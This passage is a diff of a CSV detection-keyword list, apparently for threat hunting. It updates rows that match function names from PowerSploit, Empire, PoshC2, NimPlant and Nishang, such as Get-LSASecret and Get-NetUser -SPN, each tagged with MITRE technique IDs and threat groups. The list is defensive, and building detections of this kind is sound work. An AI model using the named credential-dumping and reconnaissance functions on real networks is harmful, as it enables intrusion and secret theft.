-"*Get-ModifiableScheduledTaskFile*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-ModifiableService*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetComputer -Unconstrainuser*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-NetDomainController*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetDomainTrust*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*get-netfileserver -domain *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Get-NetFileServer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-NetFileServer*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetForestDomain*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-NetGPOGroup*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetLocalGroup*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetLoggedon -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-NetLoggedon*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetRDPSession -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-NetRDPSession*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetUser -SPN*","offensive_tool_keyword","empire","Empire scripts functions. 
Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-NetUser -UACFilter NOT_ACCOUNTDISABLE*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*getNimplantByGuid*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Get-LSASecret*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Get-ModifiableRegistryAutoRun*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ModifiableRegistryAutoRun*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection 
of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-ModifiableScheduledTaskFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-ModifiableScheduledTaskFile*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-ModifiableService*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetComputer -Unconstrainuser*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetDomainController*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetDomainTrust*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*get-netfileserver -domain *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-NetFileServer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetFileServer*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-NetForestDomain*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-NetGPOGroup*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
